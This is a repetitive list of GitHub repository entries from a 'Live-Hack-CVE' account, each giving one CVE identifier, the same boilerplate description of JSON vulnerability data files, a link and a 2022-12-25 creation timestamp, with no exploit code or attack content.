**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2471 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2471](https://github.com/Live-Hack-CVE/CVE-2022-2471) create time: 2022-12-25T19:56:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38430 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38430](https://github.com/Live-Hack-CVE/CVE-2022-38430) create time: 2022-12-25T19:55:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38431 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38431](https://github.com/Live-Hack-CVE/CVE-2022-38431) create time: 2022-12-25T19:55:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38432](https://github.com/Live-Hack-CVE/CVE-2022-38432) create time: 2022-12-25T19:55:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38433](https://github.com/Live-Hack-CVE/CVE-2022-38433) create time: 2022-12-25T19:55:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38999](https://github.com/Live-Hack-CVE/CVE-2022-38999) create time: 2022-12-25T19:55:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39000](https://github.com/Live-Hack-CVE/CVE-2022-39000) create time: 2022-12-25T19:55:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3182 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3182](https://github.com/Live-Hack-CVE/CVE-2022-3182) create time: 2022-12-25T19:55:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35973](https://github.com/Live-Hack-CVE/CVE-2022-35973) create time: 2022-12-25T19:55:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35974 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35974](https://github.com/Live-Hack-CVE/CVE-2022-35974) create time: 2022-12-25T19:55:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35972 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35972](https://github.com/Live-Hack-CVE/CVE-2022-35972) create time: 2022-12-25T19:54:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35969 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35969](https://github.com/Live-Hack-CVE/CVE-2022-35969) create time: 2022-12-25T19:54:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35971](https://github.com/Live-Hack-CVE/CVE-2022-35971) create time: 2022-12-25T19:54:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35970](https://github.com/Live-Hack-CVE/CVE-2022-35970) create time: 2022-12-25T19:54:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35966](https://github.com/Live-Hack-CVE/CVE-2022-35966) create time: 2022-12-25T19:54:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35968](https://github.com/Live-Hack-CVE/CVE-2022-35968) create time: 2022-12-25T19:53:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35967 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35967](https://github.com/Live-Hack-CVE/CVE-2022-35967) create time: 2022-12-25T19:53:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2005-2970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2005-2970](https://github.com/Live-Hack-CVE/CVE-2005-2970) create time: 2022-12-25T19:10:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2005-2700 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2005-2700](https://github.com/Live-Hack-CVE/CVE-2005-2700) create time: 2022-12-25T19:10:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2005-2088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2005-2088](https://github.com/Live-Hack-CVE/CVE-2005-2088) create time: 2022-12-25T19:10:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2006-5752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2006-5752](https://github.com/Live-Hack-CVE/CVE-2006-5752) create time: 2022-12-25T19:10:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2006-3918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2006-3918](https://github.com/Live-Hack-CVE/CVE-2006-3918) create time: 2022-12-25T19:10:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2006-7142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2006-7142](https://github.com/Live-Hack-CVE/CVE-2006-7142) create time: 2022-12-25T18:30:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-3847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-3847](https://github.com/Live-Hack-CVE/CVE-2007-3847) create time: 2022-12-25T19:11:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-3304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-3304](https://github.com/Live-Hack-CVE/CVE-2007-3304) create time: 2022-12-25T19:10:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-0456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-0456](https://github.com/Live-Hack-CVE/CVE-2008-0456) create time: 2022-12-25T19:11:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-0455 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-0455](https://github.com/Live-Hack-CVE/CVE-2008-0455) create time: 2022-12-25T19:11:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-0005 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-0005](https://github.com/Live-Hack-CVE/CVE-2008-0005) create time: 2022-12-25T19:11:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1506](https://github.com/Live-Hack-CVE/CVE-2013-1506) create time: 2022-12-25T19:09:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2391 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2391](https://github.com/Live-Hack-CVE/CVE-2013-2391) create time: 2022-12-25T19:08:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0420](https://github.com/Live-Hack-CVE/CVE-2014-0420) create time: 2022-12-25T19:08:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2432](https://github.com/Live-Hack-CVE/CVE-2014-2432) create time: 2022-12-25T19:08:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4243](https://github.com/Live-Hack-CVE/CVE-2014-4243) create time: 2022-12-25T19:08:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0668 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0668](https://github.com/Live-Hack-CVE/CVE-2016-0668) create time: 2022-12-25T19:08:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-20015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-20015](https://github.com/Live-Hack-CVE/CVE-2016-20015) create time: 2022-12-25T19:05:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9339](https://github.com/Live-Hack-CVE/CVE-2017-9339) create time: 2022-12-25T19:12:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9340](https://github.com/Live-Hack-CVE/CVE-2017-9340) create time: 2022-12-25T19:12:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9338](https://github.com/Live-Hack-CVE/CVE-2017-9338) create time: 2022-12-25T19:12:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3653](https://github.com/Live-Hack-CVE/CVE-2017-3653) create time: 2022-12-25T19:09:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2767 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2767](https://github.com/Live-Hack-CVE/CVE-2018-2767) create time: 2022-12-25T19:09:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-20823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-20823](https://github.com/Live-Hack-CVE/CVE-2018-20823) create time: 2022-12-25T18:32:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-12762 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-12762](https://github.com/Live-Hack-CVE/CVE-2019-12762) create time: 2022-12-25T18:33:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-8413 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-8413](https://github.com/Live-Hack-CVE/CVE-2019-8413) create time: 2022-12-25T18:32:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28646](https://github.com/Live-Hack-CVE/CVE-2020-28646) create time: 2022-12-25T19:12:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35533](https://github.com/Live-Hack-CVE/CVE-2020-35533) create time: 2022-12-25T19:07:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36602](https://github.com/Live-Hack-CVE/CVE-2020-36602) create time: 2022-12-25T18:34:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44537 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44537](https://github.com/Live-Hack-CVE/CVE-2021-44537) create time: 2022-12-25T19:12:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46834 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46834](https://github.com/Live-Hack-CVE/CVE-2021-46834) create time: 2022-12-25T19:05:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46835](https://github.com/Live-Hack-CVE/CVE-2021-46835) create time: 2022-12-25T18:33:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31002](https://github.com/Live-Hack-CVE/CVE-2021-31002) create time: 2022-12-25T18:32:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31013](https://github.com/Live-Hack-CVE/CVE-2021-31013) create time: 2022-12-25T18:31:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43310](https://github.com/Live-Hack-CVE/CVE-2021-43310) create time: 2022-12-25T18:29:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33076](https://github.com/Live-Hack-CVE/CVE-2021-33076) create time: 2022-12-25T18:27:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33079 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33079](https://github.com/Live-Hack-CVE/CVE-2021-33079) create time: 2022-12-25T18:27:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33081](https://github.com/Live-Hack-CVE/CVE-2021-33081) create time: 2022-12-25T18:27:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2309](https://github.com/Live-Hack-CVE/CVE-2021-2309) create time: 2022-12-25T18:25:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35540 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35540](https://github.com/Live-Hack-CVE/CVE-2021-35540) create time: 2022-12-25T18:25:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35538 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35538](https://github.com/Live-Hack-CVE/CVE-2021-35538) create time: 2022-12-25T18:24:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35542](https://github.com/Live-Hack-CVE/CVE-2021-35542) create time: 2022-12-25T18:24:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35545](https://github.com/Live-Hack-CVE/CVE-2021-35545) create time: 2022-12-25T18:24:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2442](https://github.com/Live-Hack-CVE/CVE-2021-2442) create time: 2022-12-25T18:24:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2409](https://github.com/Live-Hack-CVE/CVE-2021-2409) create time: 2022-12-25T18:24:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2443 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2443](https://github.com/Live-Hack-CVE/CVE-2021-2443) create time: 2022-12-25T18:24:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37203](https://github.com/Live-Hack-CVE/CVE-2022-37203) create time: 2022-12-25T19:13:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40234 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40234](https://github.com/Live-Hack-CVE/CVE-2022-40234) create time: 2022-12-25T19:13:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40608](https://github.com/Live-Hack-CVE/CVE-2022-40608) create time: 2022-12-25T19:13:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37700 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37700](https://github.com/Live-Hack-CVE/CVE-2022-37700) create time: 2022-12-25T19:13:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38887](https://github.com/Live-Hack-CVE/CVE-2022-38887) create time: 2022-12-25T19:13:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38576 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38576](https://github.com/Live-Hack-CVE/CVE-2022-38576) create time: 2022-12-25T19:13:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2995](https://github.com/Live-Hack-CVE/CVE-2022-2995) create time: 2022-12-25T19:13:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3079 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3079](https://github.com/Live-Hack-CVE/CVE-2022-3079) create time: 2022-12-25T19:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3239](https://github.com/Live-Hack-CVE/CVE-2022-3239) create time: 2022-12-25T19:12:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28204](https://github.com/Live-Hack-CVE/CVE-2022-28204) create time: 2022-12-25T19:12:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38351](https://github.com/Live-Hack-CVE/CVE-2022-38351) create time: 2022-12-25T19:12:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40023](https://github.com/Live-Hack-CVE/CVE-2022-40023) create time: 2022-12-25T19:12:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40980](https://github.com/Live-Hack-CVE/CVE-2022-40980) create time: 2022-12-25T19:12:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40141](https://github.com/Live-Hack-CVE/CVE-2022-40141) create time: 2022-12-25T19:12:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40140](https://github.com/Live-Hack-CVE/CVE-2022-40140) create time: 2022-12-25T19:12:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0143](https://github.com/Live-Hack-CVE/CVE-2022-0143) create time: 2022-12-25T19:12:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35062](https://github.com/Live-Hack-CVE/CVE-2022-35062) create time: 2022-12-25T19:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35060](https://github.com/Live-Hack-CVE/CVE-2022-35060) create time: 2022-12-25T19:12:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35061](https://github.com/Live-Hack-CVE/CVE-2022-35061) create time: 2022-12-25T19:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40139](https://github.com/Live-Hack-CVE/CVE-2022-40139) create time: 2022-12-25T19:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39974 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39974](https://github.com/Live-Hack-CVE/CVE-2022-39974) create time: 2022-12-25T19:12:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3213](https://github.com/Live-Hack-CVE/CVE-2022-3213) create time: 2022-12-25T19:11:57Z

